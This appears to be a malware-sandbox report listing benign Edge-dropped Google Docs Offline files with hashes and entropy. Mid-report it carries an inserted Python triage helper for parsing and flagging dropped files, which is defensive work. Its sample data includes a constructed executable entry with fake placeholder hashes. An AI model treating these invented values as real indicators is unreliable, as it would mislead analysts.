                                                                                                                                                                Preview:{.. "createnew": {.. "message": "YEN. OLU.TUR".. },.. "explanationofflinedisabled": {.. "message": ".nternet'e ba.l. de.ilsiniz. Google Dok.manlar'. .nternet ba.lant.s. olmadan kullanmak i.in, .nternet'e ba.lanabildi.inizde Google Dok.manlar ana sayfas.nda Ayarlar'a gidin ve .evrimd... senkronizasyonu etkinle.tirin.".. },.. "explanationofflineenabled": {.. "message": ".nternet'e ba.l. de.ilsiniz. Ancak, yine de mevcut dosyalar. d.zenleyebilir veya yeni dosyalar olu.turabilirsiniz.".. },.. "extdesc": {.. "message": "Dok.man, e-tablo ve sunu olu.turun, bunlar. d.zenleyin ve g.r.nt.leyin. T.m bu i.lemleri internet eri.imi olmadan yapabilirsiniz.".. },.. "extname": {.. "message": "Google Dok.manlar .evrimd...".. },.. "learnmore": {.. "message": "Daha Fazla Bilgi".. },.. "popuphelptext": {.. "message": ".nternet ba.lant.n.z olsun veya olmas.n, nerede olursan.z olun yaz.n, d.zenl
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:JSON data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):1333
                                                                                                                                                                Entropy (8bit):4.686760246306605
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:24:1HAk9oxkm6H4KyGGB9GeGoxPEYMQhpARezTtHUN97zlwpEH7:VKU1GB9GeBc/OARETt+9/WCb
                                                                                                                                                                MD5:970963C25C2CEF16BB6F60952E103105
                                                                                                                                                                SHA1:BBDDACFEEE60E22FB1C130E1EE8EFDA75EA600AA
                                                                                                                                                                SHA-256:9FA26FF09F6ACDE2457ED366C0C4124B6CAC1435D0C4FD8A870A0C090417DA19
                                                                                                                                                                SHA-512:1BED9FE4D4ADEED3D0BC8258D9F2FD72C6A177C713C3B03FC6F5452B6D6C2CB2236C54EA972ECE7DBFD756733805EB2352CAE44BAB93AA8EA73BB80460349504
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:{.. "createnew": {.. "message": "........".. },.. "explanationofflinedisabled": {.. "message": ".. . ...... ....... ... ............. Google ........... ... ......... . .........., ......... . ............ .. ........ ........ Google .......... . ......... ......-............., .... ...... . .......".. },.. "explanationofflineenabled": {.. "message": ".. . ...... ......, ..... ... .... ...... .......... ........ ..... ... .......... .....".. },.. "extdesc": {.. "message": "........., ......... . ............ ........., .......... ....... .. ........... ... ....... .. ..........".. },.. "extname": {.. "message": "Goo
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:JSON data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):1263
                                                                                                                                                                Entropy (8bit):4.861856182762435
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:24:1HAl3zNEUhN3mNjkSIkmdNpInuUVsqNtOJDhY8Dvp/IkLzx:e3uUhQKvkmd+s11Lp1F
                                                                                                                                                                MD5:8B4DF6A9281333341C939C244DDB7648
                                                                                                                                                                SHA1:382C80CAD29BCF8AAF52D9A24CA5A6ECF1941C6B
                                                                                                                                                                SHA-256:5DA836224D0F3A96F1C5EB5063061AAD837CA9FC6FED15D19C66DA25CF56F8AC
                                                                                                                                                                SHA-512:FA1C015D4EA349F73468C78FDB798D462EEF0F73C1A762298798E19F825E968383B0A133E0A2CE3B3DF95F24C71992235BFC872C69DC98166B44D3183BF8A9E5
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:{.. "createnew": {.. "message": "... ......".. },.. "explanationofflinedisabled": {.. "message": ".. .. .... .... Google Docs .. .... ....... ..... ....... .... ..... .... ... .. .. ....... .. ..... ... .. Google Docs ... ... .. ....... .. ..... ... .. .... ...... ..... .. .. .....".. },.. "explanationofflineenabled": {.. "message": ".. .. .... ... .... .. ... ... ...... ..... ... ..... .. .... ... .. ... ..... ... .... ....".. },.. "extdesc": {.. "message": ".......... .......... ... ....... . .... ... ....... .. ..... .. .... ...... ..... .... ... ..... .......".. },.. "extname": {.. "message": "Google Docs .. ....".. },.. "learnmore": {..
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:JSON data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):1074
                                                                                                                                                                Entropy (8bit):5.062722522759407
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:24:1HAhBBLEBOVUSUfE+eDFmj4BLErQ7e2CIer32KIxqJ/HtNiE5nIGeU+KCVT:qHCDheDFmjDQgX32/S/hI9jh
                                                                                                                                                                MD5:773A3B9E708D052D6CBAA6D55C8A5438
                                                                                                                                                                SHA1:5617235844595D5C73961A2C0A4AC66D8EA5F90F
                                                                                                                                                                SHA-256:597C5F32BC999746BC5C2ED1E5115C523B7EB1D33F81B042203E1C1DF4BBCAFE
                                                                                                                                                                SHA-512:E5F906729E38B23F64D7F146FA48F3ABF6BAED9AAFC0E5F6FA59F369DC47829DBB4BFA94448580BD61A34E844241F590B8D7AEC7091861105D8EBB2590A3BEE9
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:{.. "createnew": {.. "message": "T.O M.I".. },.. "explanationofflinedisabled": {.. "message": "B.n .ang ngo.i tuy.n. .. s. d.ng Google T.i li.u m. kh.ng c.n k.t n.i Internet, .i ..n c.i ..t tr.n trang ch. c.a Google T.i li.u v. b.t ..ng b. h.a ngo.i tuy.n v.o l.n ti.p theo b.n ...c k.t n.i v.i m.ng Internet.".. },.. "explanationofflineenabled": {.. "message": "B.n .ang ngo.i tuy.n, tuy nhi.n b.n v.n c. th. ch.nh s.a c.c t.p c. s.n ho.c t.o c.c t.p m.i.".. },.. "extdesc": {.. "message": "Ch.nh s.a, t.o v. xem t.i li.u, b.ng t.nh v. b.n tr.nh b.y . t.t c. m. kh.ng c.n truy c.p Internet.".. },.. "extname": {.. "message": "Google T.i li.u ngo.i tuy.n".. },.. "learnmore": {.. "message": "Ti.m hi..u th.m".. },.. "popuphelptext": {.. "message": "Vi.t, ch.nh s.a v. c.ng t.c
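The dropped-file entries above are flattened into one `Field:value` row per line, which is hard to pivot on by hand when a report lists hundreds of benign browser locale files next to the few drops that matter. The following Python is an added triage helper, not Joe Sandbox code: it parses rows of exactly this shape into records, re-derives the `Entropy (8bit)` and hash columns from file bytes so a reader can check them against a local copy, and flags entries worth a second look (marked malicious, written by a process other than the browser, or a PE image). The first sample record is copied from the Edge locale entry above; the second record, its path, size and hash strings are constructed for the example and do not come from the report.

```python
"""Triage helper for the flattened 'Dropped Files' rows of a Joe Sandbox
report page.  Added example, not Joe Sandbox tooling."""
import hashlib
import math
from collections import Counter

# Field names exactly as they appear at the start of each report row.
FIELDS = ("Process", "File Type", "Category", "Size (bytes)", "Entropy (8bit)",
          "Encrypted", "SSDEEP", "MD5", "SHA1", "SHA-256", "SHA-512",
          "Malicious", "Preview")

# Constructed sample input.  Record 1 is the Edge locale JSON entry from the
# report (hashes copied from the page, preview truncated).  Record 2 is
# entirely made up for the example: path, size and hash strings are fake.
SAMPLE_REPORT = r"""
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):1320
Entropy (8bit):4.569671329405572
Encrypted:false
MD5:7F5F8933D2D078618496C67526A2B066
SHA1:B7050E3EFA4D39548577CF47CB119FA0E246B7A4
SHA-256:4E8B69E864F57CDDD4DC4E4FAF2C28D496874D06016BC22E8D39E0CB69552769
Malicious:false
Preview:{.. "createnew": {.. "message": "....... ....".. },..
Process:C:\Users\user\Desktop\kXzODlqJak.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):12345
Entropy (8bit):7.9
Encrypted:true
MD5:CONSTRUCTED0000000000000000000000
SHA-256:CONSTRUCTED00000000000000000000000000000000000000000000000000000
Malicious:false
"""


def parse_dropped_files(text):
    """Turn 'Field:value' rows into one dict per dropped file.
    A new record starts at each 'Process:' row, the first field of an entry.
    Splitting on the first colon keeps 'C:\\...' paths and JSON previews intact."""
    records, current = [], None
    for raw in text.splitlines():
        key, sep, value = raw.strip().partition(":")
        if not sep or key not in FIELDS:
            continue  # page chrome, blank line, or a wrapped preview fragment
        if key == "Process":
            current = {}
            records.append(current)
        if current is not None:
            current[key] = value
    return records


def shannon_entropy_8bit(data):
    """Byte-level Shannon entropy in bits per byte, 0.0 to 8.0: the quantity
    the report's 'Entropy (8bit)' column shows.  Packed or encrypted payloads
    sit near 8.0; UTF-8 text such as the locale files sits around 4 to 5."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def hashes(data):
    """Upper-case hex digests in the same columns the report uses."""
    return {"MD5": hashlib.md5(data).hexdigest().upper(),
            "SHA1": hashlib.sha1(data).hexdigest().upper(),
            "SHA-256": hashlib.sha256(data).hexdigest().upper()}


def triage(records, trusted_processes=("msedge.exe",)):
    """Return (sha256, reasons) for records that deserve a look: flagged
    malicious, written by a process outside the trusted list, or a PE image.
    Benign browser drops (locale JSON written by msedge.exe) fall through."""
    flagged = []
    for r in records:
        proc = r.get("Process", "").rsplit("\\", 1)[-1].lower()
        reasons = []
        if r.get("Malicious", "false").lower() != "false":
            reasons.append("marked malicious")
        if proc not in trusted_processes:
            reasons.append("written by " + proc)
        if "PE32" in r.get("File Type", ""):
            reasons.append("PE image dropped")
        if reasons:
            flagged.append((r.get("SHA-256"), reasons))
    return flagged


if __name__ == "__main__":
    recs = parse_dropped_files(SAMPLE_REPORT)
    print(len(recs), "dropped-file records parsed")
    for sha, why in triage(recs):
        print(sha, "->", ", ".join(why))
    # Sanity check of the entropy column on bytes with a known answer.
    print("entropy(b'abcd') =", shannon_entropy_8bit(b"abcd"))
```

To use it on a real report, paste the Dropped Files section into a file and pass its text to `parse_dropped_files`; the `SHA-256` values of the flagged records can go straight into a blocklist, and `hashes()` / `shannon_entropy_8bit()` let you confirm a locally obtained sample matches the columns the sandbox printed.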

Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):879
Entropy (8bit):5.7905809868505544
Encrypted:false
SSDEEP:12:1HASvgteHCBxNtSBXuetOrgIkA2OrWjMOCBxetSBXK01fg/SOiCSUEQ27e1CBhUj:1HAFsHtrIkA2jqldI/727eggcLk9pf
MD5:3E76788E17E62FB49FB5ED5F4E7A3DCE
SHA1:6904FFA0D13D45496F126E58C886C35366EFCC11
SHA-256:E72D0BB08CC3005556E95A498BD737E7783BB0E56DCC202E7D27A536616F5EE0
SHA-512:F431E570AB5973C54275C9EEF05E49E6FE2D6C17000F98D672DD31F9A1FAD98E0D50B5B0B9CF85D5BBD3B655B93FD69768C194C8C1688CB962AA75FF1AF9BDB6
Malicious:false
Preview:{.. "createnew": {.. "message": "..".. },.. "explanationofflinedisabled": {.. "message": "....................... Google ................ Google ....................".. },.. "explanationofflineenabled": {.. "message": ".............................".. },.. "extdesc": {.. "message": "...................... - ........".. },.. "extname": {.. "message": "Google .......".. },.. "learnmore": {.. "message": "....".. },.. "popuphelptext": {.. "message": "...............................".. }..}..

Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):1205
Entropy (8bit):4.50367724745418
Encrypted:false
SSDEEP:24:YWvqB0f7Cr591AhI9Ah8U1F4rw4wtB9G976d6BY9scKUrPoAhNehIrI/uIXS1:YWvl7Cr5JHrw7k7u6BY9trW+rHR
MD5:524E1B2A370D0E71342D05DDE3D3E774
SHA1:60D1F59714F9E8F90EF34138D33FBFF6DD39E85A
SHA-256:30F44CFAD052D73D86D12FA20CFC111563A3B2E4523B43F7D66D934BA8DACE91
SHA-512:D2225CF2FA94B01A7B0F70A933E1FDCF69CDF92F76C424CE4F9FCC86510C481C9A87A7B71F907C836CBB1CA41A8BEBBD08F68DBC90710984CA738D293F905272
Malicious:false
Preview:{"createnew":{"message":"\u5efa\u7acb\u65b0\u9805\u76ee"},"explanationofflinedisabled":{"message":"\u60a8\u8655\u65bc\u96e2\u7dda\u72c0\u614b\u3002\u5982\u8981\u5728\u6c92\u6709\u4e92\u806f\u7db2\u9023\u7dda\u7684\u60c5\u6cc1\u4e0b\u4f7f\u7528\u300cGoogle \u6587\u4ef6\u300d\uff0c\u8acb\u524d\u5f80\u300cGoogle \u6587\u4ef6\u300d\u9996\u9801\u7684\u8a2d\u5b9a\uff0c\u4e26\u5728\u4e0b\u6b21\u9023\u63a5\u4e92\u806f\u7db2\u6642\u958b\u555f\u96e2\u7dda\u540c\u6b65\u529f\u80fd\u3002"},"explanationofflineenabled":{"message":"\u60a8\u8655\u65bc\u96e2\u7dda\u72c0\u614b\uff0c\u4f46\u60a8\u4ecd\u53ef\u4ee5\u7de8\u8f2f\u53ef\u7528\u6a94\u6848\u6216\u5efa\u7acb\u65b0\u6a94\u6848\u3002"},"extdesc":{"message":"\u7de8\u8f2f\u3001\u5efa\u7acb\u53ca\u67e5\u770b\u60a8\u7684\u6587\u4ef6\u3001\u8a66\u7b97\u8868\u548c\u7c21\u5831\uff0c\u5b8c\u5168\u4e0d\u9700\u4f7f\u7528\u4e92\u806f\u7db2\u3002"},"extname":{"message":"\u300cGoogle \u6587\u4ef6\u300d\u96e2\u7dda\u7248"},"learnmore":{"message":"\u77ad\u89e3\u8a

Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):843
Entropy (8bit):5.76581227215314
Encrypted:false
SSDEEP:12:1HASvgmaCBxNtBtA24ZOuAeOEHGOCBxetBtMHQIJECSUnLRNocPNy6CBhU5OGg1O:1HAEfQkekYyLvRmcPGgzcL2kx5U
MD5:0E60627ACFD18F44D4DF469D8DCE6D30
SHA1:2BFCB0C3CA6B50D69AD5745FA692BAF0708DB4B5
SHA-256:F94C6DDEDF067642A1AF18D629778EC65E02B6097A8532B7E794502747AEB008
SHA-512:6FF517EED4381A61075AC7C8E80C73FAFAE7C0583BA4FA7F4951DD7DBE183C253702DEE44B3276EFC566F295DAC1592271BE5E0AC0C7D2C9F6062054418C7C27
Malicious:false
Preview:{.. "createnew": {.. "message": ".....".. },.. "explanationofflinedisabled": {.. "message": ".................. Google ................ Google .................".. },.. "explanationofflineenabled": {.. "message": ".........................".. },.. "extdesc": {.. "message": ".............................".. },.. "extname": {.. "message": "Google .....".. },.. "learnmore": {.. "message": "....".. },.. "popuphelptext": {.. "message": "................................".. }..}..

Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):912
Entropy (8bit):4.65963951143349
Encrypted:false
SSDEEP:24:YlMBKqLnI7EgBLWFQbTQIF+j4h3OadMJzLWnCieqgwLeOvKrCRPE:YlMBKqjI7EQOQb0Pj4heOWqeyaBrMPE
MD5:71F916A64F98B6D1B5D1F62D297FDEC1
SHA1:9386E8F723C3F42DA5B3F7E0B9970D2664EA0BAA
SHA-256:EC78DDD4CCF32B5D76EC701A20167C3FBD146D79A505E4FB0421FC1E5CF4AA63
SHA-512:30FA4E02120AF1BE6E7CC7DBB15FAE5D50825BD6B3CF28EF21D2F2E217B14AF5B76CFCC165685C3EDC1D09536BFCB10CA07E1E2CC0DA891CEC05E19394AD7144
Malicious:false
Preview:{"createnew":{"message":"DALA ENTSHA"},"explanationofflinedisabled":{"message":"Awuxhunyiwe ku-inthanethi. Ukuze usebenzise i-Google Amadokhumenti ngaphandle koxhumano lwe-inthanethi, iya kokuthi izilungiselelo ekhasini lasekhaya le-Google Amadokhumenti bese uvula ukuvumelanisa okungaxhunyiwe ku-inthanethi ngesikhathi esilandelayo lapho uxhunywe ku-inthanethi."},"explanationofflineenabled":{"message":"Awuxhunyiwe ku-inthanethi, kodwa usangakwazi ukuhlela amafayela atholakalayo noma udale amasha."},"extdesc":{"message":"Hlela, dala, futhi ubuke amadokhumenti akho, amaspredishithi, namaphrezentheshini \u2014 konke ngaphandle kokufinyelela kwe-inthanethi."},"extname":{"message":"I-Google Amadokhumenti engaxhumekile ku-intanethi"},"learnmore":{"message":"Funda kabanzi"},"popuphelptext":{"message":"Bhala, hlela, futhi hlanganyela noma yikuphi lapho okhona, unalo noma ungenalo uxhumano lwe-inthanethi."}}.

Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):11406
Entropy (8bit):5.745845607168024
Encrypted:false
SSDEEP:192:RBG1G1UPkUj/86Op//Ier/2nsNLJtwg+K8HNnswuH+svyw6r+cgTSJJT4LGkt:m8IEI4u8/EgG4
MD5:0A68C9539A188B8BB4F9573F2F2321D6
SHA1:E0F814FA4DCC04EDC6A5D39CBC1038979E88F0E5
SHA-256:39E6C25D096AFD156644F07586D85E37F1F7B3DA9B636471E8D15CEB14DB184F
SHA-512:13F133C173C6622B8E1B6F86A551CBC5B0B2446B3CF96E4AE8CA2646009B99E4A360C2DB3168CB94A488FAEBD215003DFA60D10150B7A85B5F8919900BD01CCC
Malicious:false
Preview:[{"description":"treehash per file","signed_content":{"payload":"

Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):854
Entropy (8bit):4.284628987131403
Encrypted:false
SSDEEP:12:ont+QByTwnnGNcMbyWM+Q9TZldnnnGGxlF/S0WOtUL0M0r:vOrGe4dDCVGOjWJ0nr
MD5:4EC1DF2DA46182103D2FFC3B92D20CA5
SHA1:FB9D1BA3710CF31A87165317C6EDC110E98994CE
SHA-256:6C69CE0FE6FAB14F1990A320D704FEE362C175C00EB6C9224AA6F41108918CA6
SHA-512:939D81E6A82B10FF73A35C931052D8D53D42D915E526665079EEB4820DF4D70F1C6AEBAB70B59519A0014A48514833FEFD687D5A3ED1B06482223A168292105D
Malicious:false
Preview:{. "type": "object",. "properties": {. "allowedDocsOfflineDomains": {. "type": "array",. "items": {. "type": "string". },. "title": "Allow users to enable Docs offline for the specified managed domains.",. "description": "Users on managed devices will be able to enable docs offline if they are part of the specified managed domains.". },. "autoEnabledDocsOfflineDomains": {. "type": "array",. "items": {. "type": "string". },. "title": "Auto enable Docs offline for the specified managed domains in certain eligible situations.",. "description": "Users on managed devices, in certain eligible situations, will be able to automatically access and edit recent files offline for the managed domains set in this property. They can still disable it from Drive settings.". }. }.}.

Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):2525
Entropy (8bit):5.417954053901
Encrypted:false
SSDEEP:24:1HEZ4WPoolELb/KxktGw3VwELb/4iL2QDkUpvdz1xxy/Atj17x9yiVvQe:WdP5aLTKQGwlTLT4oRvvxs/AP7xgiVb
MD5:5E425DC36364927B1348F6C48B68C948
SHA1:9E411B88453DEF3F7CFCB3EAA543C69AD832B82F
SHA-256:32D9C8DE71A40D71FC61AD52AA07E809D07DF57A2F4F7855E8FC300F87FFC642
SHA-512:C19217B9AF82C1EE1015D4DFC4234A5CE0A4E482430455ABAAFAE3F9C8AE0F7E5D2ED7727502760F1B0656F0A079CB23B132188AE425E001802738A91D8C5D79
Malicious:false
Preview:{.. "author": {.. "email": "docs-hosted-app-own@google.com".. },.. "background": {.. "service_worker": "service_worker_bin_prod.js".. },.. "content_capabilities": {.. "matches": [ "https://docs.google.com/*", "https://drive.google.com/*", "https://drive-autopush.corp.google.com/*", "https://drive-daily-0.corp.google.com/*", "https://drive-daily-1.corp.google.com/*", "https://drive-daily-2.corp.google.com/*", "https://drive-daily-3.corp.google.com/*", "https://drive-daily-4.corp.google.com/*", "https://drive-daily-5.corp.google.com/*", "https://drive-daily-6.corp.google.com/*", "https://drive-preprod.corp.google.com/*", "https://drive-staging.corp.google.com/*" ],.. "permissions": [ "clipboardRead", "clipboardWrite", "unlimitedStorage" ].. },.. "content_security_policy": {.. "extension_pages": "script-src 'self'; object-src 'self'".. },.. "default_locale": "en_US",.. "description": "__MSG_extDesc__",.. "externally_connectable": {.. "ma

Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:HTML document, ASCII text
Category:dropped
Size (bytes):97
Entropy (8bit):4.862433271815736
Encrypted:false
SSDEEP:3:PouV7uJL5XL/oGLvLAAJR90bZNGXIL0Hac4NGb:hxuJL5XsOv0EmNV4HX4Qb
MD5:B747B5922A0BC74BBF0A9BC59DF7685F
SHA1:7BF124B0BE8EE2CFCD2506C1C6FFC74D1650108C
SHA-256:B9FA2D52A4FFABB438B56184131B893B04655B01F336066415D4FE839EFE64E7
SHA-512:7567761BE4054FCB31885E16D119CD4E419A423FFB83C3B3ED80BFBF64E78A73C2E97AAE4E24AB25486CD1E43877842DB0836DB58FBFBCEF495BC53F9B2A20EC
Malicious:false
Preview:<!DOCTYPE html>.<html>.<body>. <script src="offscreendocument_main.js"></script>.</body>.</html>

Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:ASCII text, with very long lines (4882)
Category:dropped
Size (bytes):122218
Entropy (8bit):5.439997574414675
Encrypted:false
SSDEEP:1536:naCwKqAbNBbV9HGsR43l9S6w3xu7gXMgaG0R6RxNbF4Ki3wqP+PrQY2PEtb1B:Jfcs1XMr2zbF4Ki+PkPEfB
MD5:67C4451398037DD1C497A1EA98227630
SHA1:F5BB00D46BCAB5A8A02E68E4895AEB6859B74AA8
SHA-256:59123D5A34A319791E90391FC55F0F4B8F5ABB6DB67353609DB25ACC3E99C166
SHA-512:17F35CE2A11C26168CC52C4AE2BEC548A1AEB1B1F9CB3475B0552BDE71CFE94C5C0C4F3F51267EF7C7D9B0E01E1D1259F48968E70EE1E905471BA0C76ECA81EA
Malicious:false
Preview:'use strict';function aa(){return function(a){return a}}function k(){return function(){}}function n(a){return function(){return this[a]}}function ba(a){return function(){return a}}var q;function ca(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}var da=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};.function ea(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}var ha=ea(this);function r(a,b){if(b)a:{var c=ha;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&da(c,a,{configurable:!0,writable:!0,value:b})}}.r("Symbol",function(a){function b(f){if(this instanceof b)throw new T

Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:ASCII text
Category:dropped
Size (bytes):291
Entropy (8bit):4.65176400421739
Encrypted:false
SSDEEP:6:2LGX86tj66rU8j6D3bWq2un/XBtzHrH9Mnj63LK603:2Q8KVqb2u/Rt3Onj1
MD5:3AB0CD0F493B1B185B42AD38AE2DD572
SHA1:079B79C2ED6F67B5A5BD9BC8C85801F96B1B0F4B
SHA-256:73E3888CCBC8E0425C3D2F8D1E6A7211F7910800EEDE7B1E23AD43D3B21173F7
SHA-512:32F9DB54654F29F39D49F7A24A1FC800DBC0D4A8A1BAB2369C6F9799BC6ADE54962EFF6010EF6D6419AE51D5B53EC4B26B6E2CDD98DEF7CC0D2ADC3A865F37D3
Malicious:false
Preview:(function(){window._docs_chrome_extension_exists=!0;window._docs_chrome_extension_features_version=2;window._docs_chrome_extension_permissions="alarms clipboardRead clipboardWrite storage unlimitedStorage offscreen".split(" ");window._docs_chrome_extension_manifest_version=3;}).call(this);.
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:ASCII text, with very long lines (4882)
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):130866
                                                                                                                                                                Entropy (8bit):5.425065147784983
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:1536:zKjBw7l0GLFqjLmqoTquyBQCGLu5fJDX5pwPGFSS2IH0dKxQ5SbNyO+DrxZlkaY8:XYQi3DX5WkfH0dKxdboDrNOdor
                                                                                                                                                                MD5:1A8A1F4E5BA291867D4FA8EF94243EFA
                                                                                                                                                                SHA1:B25076D2AE85BD5E4ABA935F758D5122CCB82C36
                                                                                                                                                                SHA-256:441385D13C00F82ABEEDD56EC9A7B2FE90658C9AACB7824DEA47BB46440C335B
                                                                                                                                                                SHA-512:F05668098B11C60D0DDC3555FCB51C3868BB07BA20597358EBA3FEED91E59F122E07ECB0BD06743461DFFF8981E3E75A53217713ABF2A78FB4F955641F63537C
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:'use strict';function aa(){return function(a){return a}}function k(){return function(){}}function n(a){return function(){return this[a]}}function ba(a){return function(){return a}}var q;function ca(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}var da=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};.function ea(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}var fa=ea(this);function r(a,b){if(b)a:{var c=fa;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&da(c,a,{configurable:!0,writable:!0,value:b})}}.r("Symbol",function(a){function b(f){if(this instanceof b)throw new T
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:Google Chrome extension, version 3
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):11185
                                                                                                                                                                Entropy (8bit):7.951995436832936
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:192:YEKh1jNlwQbamjq6Bcykrs3kAVg55GzVQM5F+XwsxNv7/lsoltBq0WG4ZeJTmrRb:fKT/BAzA05Gn5F+XV7NNltrWG4kJTm1b
                                                                                                                                                                MD5:78E47DDA17341BED7BE45DCCFD89AC87
                                                                                                                                                                SHA1:1AFDE30E46997452D11E4A2ADBBF35CCE7A1404F
                                                                                                                                                                SHA-256:67D161098BE68CD24FEBC0C7B48F515F199DDA72F20AE3BBB97FCF2542BB0550
                                                                                                                                                                SHA-512:9574A66D3756540479DC955C4057144283E09CAE11CE11EBCE801053BB48E536E67DC823B91895A9E3EE8D3CB27C065D5E9030C39A26CBF3F201348385B418A5
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:Cr24..............0.."0...*.H.............0.........N.......E#......9e.u.q...VYY..@.+.C..k.O..bK.`..6.G..%.....3Z...e _.6....F..1p..K.Z......./ .3...OT..`..0...Y...FT..43.th.y...}....p.L...2S.&i.`..o...f.oH.....N..:..ijT.3.F{.0.,.f?'f.CQt;b_"Pc.. ..~S.I.c.8Z.;.....{G.a......k...>.`.o..%.$>;.....g.............jg?.R..@.:..........&..{...x@.Py..;kT....%F".S..w...N....9...A..@X.t!i.@..1;......1E..X.....[.~$....J......;=T.;)k..Y...$......S......M.P..P..>..=..u.....2p...w.9..1qw.a\A..Vj .C.....A..Cf1.r6.A...L. _m...[..l.Wr_../.. .B..9!.!+..ZG.K.......0.."0...*.H.............0.........^SUd%Q.L].......Cl2o...\[.....'*...;R=....N.C5....d. .....J.C>u.kr..Y..syJC.XS.q..E.n?....(G.5..)2.G..!.M.SS.{..U....!.EE..M[.#qs.A.1...g)nQ.c..G....Bd..7... .O.BI..KXQ..4.d.K.0......g.....-p....Z.E{...M&.~n.TE7..{0....5.#.C+3.y)pd9.e.........@..3.9..B.....I....2nX........2.?.~..S....]G.N.....Lr.O.Ve....9..D1.G..W)...P.?=.#..7.R.lz..a.wX.e..h.h.~....v..RP.@X....d.G
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:JSON data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):1753
                                                                                                                                                                Entropy (8bit):5.8889033066924155
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:48:Pxpr7Xka2NXDpfsBJODI19Kg1JqcJW9O//JE3ZBDcpu/x:L3XgNSz9/4kIO3u3Xgpq
                                                                                                                                                                MD5:738E757B92939B24CDBBD0EFC2601315
                                                                                                                                                                SHA1:77058CBAFA625AAFBEA867052136C11AD3332143
                                                                                                                                                                SHA-256:D23B2BA94BA22BBB681E6362AE5870ACD8A3280FA9E7241B86A9E12982968947
                                                                                                                                                                SHA-512:DCA3E12DD5A9F1802DB6D11B009FCE2B787E79B9F730094367C9F26D1D87AF1EA072FF5B10888648FB1231DD83475CF45594BB0C9915B655EE363A3127A5FFC2
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:[.. {.. "description": "treehash per file",.. "signed_content": {.. "payload": "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",.. "signatures": [.. {.. "header": {.. "kid": "publisher".. },.. "protected": "eyJhbGciOiJSUzI1NiJ9",.. "signature": "UglEEilkOml5P1W0X6wc-_dB87PQB73uMir11923av57zPKujb4IUe_lbGpn7cRZsy6x-8i9eEKxAW7L2TSmYqrcp4XtiON6ppcf27FWACXOUJDax9wlMr-EOtyZhykCnB9vR
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:Unicode text, UTF-8 text, with very long lines (8031), with no line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):9815
                                                                                                                                                                Entropy (8bit):6.1716321262973315
                                                                                                                                                                Encrypted:false
